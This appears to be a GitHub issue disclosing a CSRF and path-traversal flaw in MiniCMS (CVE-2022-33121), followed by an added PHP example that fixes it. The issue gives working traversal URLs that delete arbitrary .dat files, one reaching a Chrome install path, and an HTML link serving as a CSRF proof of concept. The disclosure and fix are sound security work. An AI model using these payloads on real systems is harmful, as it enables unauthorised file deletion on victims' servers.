There is CSRF vulnerabilities that can lead to deleting local .dat files #45

Closed
youki992 opened this issue Jun 11, 2022 · 2 comments

youki992 commented Jun 11, 2022

Software link: https://github.com/bg5sbk/MiniCMS

After the installation is complete, log in as administrator and open the page.

In post.php, a user can delete any local .dat file without any filtering.

XgVxl6.png

Create 1.dat in the parent directory

XgZ9mD.png

To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=

You can also delete any .dat file, such as a local Google Chrome file.

XgZPTH.png

http://127.0.0.1:80/MiniCMS-master/mc-admin/page.php?delete=../../../../../../../../opt/google/chrome/icudtl&state=delete&date=&tag=

Here is the CSRF PoC, test.html: log in and click the link in test.html. By modifying the delete parameter, users will end up deleting the .dat file in the specified directory.

```html
<a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a>
```

@youki992 youki992 changed the title There are two CSRF vulnerabilities that can lead to deleting local .dat files There is CSRF vulnerabilities that can lead to deleting local .dat files Jun 11, 2022
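
One way to close both gaps the report describes (a delete that fires on a GET request with no anti-CSRF token, and a `delete` value that reaches the filesystem unfiltered), shown as an added example that is not MiniCMS code and not part of the original issue. `resolve_record`, `handle_delete`, the `csrf_token` field and the `data` directory layout are assumptions.

```php
<?php
// Added example; every name here is hypothetical, none of it is MiniCMS code.

// Map $id to its .dat file, or null if $id is not a plain identifier or the file is outside $dataDir.
function resolve_record(string $dataDir, string $id): ?string
{
    // Allow-list keeps '/', '\' and '.' out of the path entirely.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        return null;
    }
    $base = realpath($dataDir);
    $path = realpath($dataDir . DIRECTORY_SEPARATOR . $id . '.dat');
    // Defence in depth: the canonical path must sit directly under the data directory.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Returns an HTTP status; deletes only on POST with a token matching the session's.
function handle_delete(string $method, array $post, array $session, string $dataDir): int
{
    if ($method !== 'POST') {
        return 405; // a plain link or image tag can only issue GET
    }
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    if (!is_string($sent) || !is_string($want) || $want === '' || !hash_equals($want, $sent)) {
        return 403;
    }
    $id = $post['delete'] ?? '';
    $path = is_string($id) ? resolve_record($dataDir, $id) : null;
    if ($path === null) {
        return 400;
    }
    return unlink($path) ? 200 : 500;
}

// Constructed demo data: one record inside the data directory, one file in its parent.
$root = sys_get_temp_dir() . '/csrf_demo_' . bin2hex(random_bytes(4));
mkdir("$root/data", 0700, true);
touch("$root/data/post1.dat");
touch("$root/1.dat");
$session = ['csrf_token' => bin2hex(random_bytes(32))];
$ok = ['csrf_token' => $session['csrf_token']];
foreach ([['GET', $ok + ['delete' => 'post1']], ['POST', ['delete' => 'post1']],
          ['POST', $ok + ['delete' => '../1']], ['POST', $ok + ['delete' => 'post1']]] as [$m, $p]) {
    printf("%-4s delete=%s -> %d\n", $m, $p['delete'], handle_delete($m, $p, $session, "$root/data"));
}
var_dump(file_exists("$root/1.dat"), file_exists("$root/data/post1.dat"));
```
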
youki992 (Author) commented

use CVE-2022-33121

youki992 (Author) commented

close
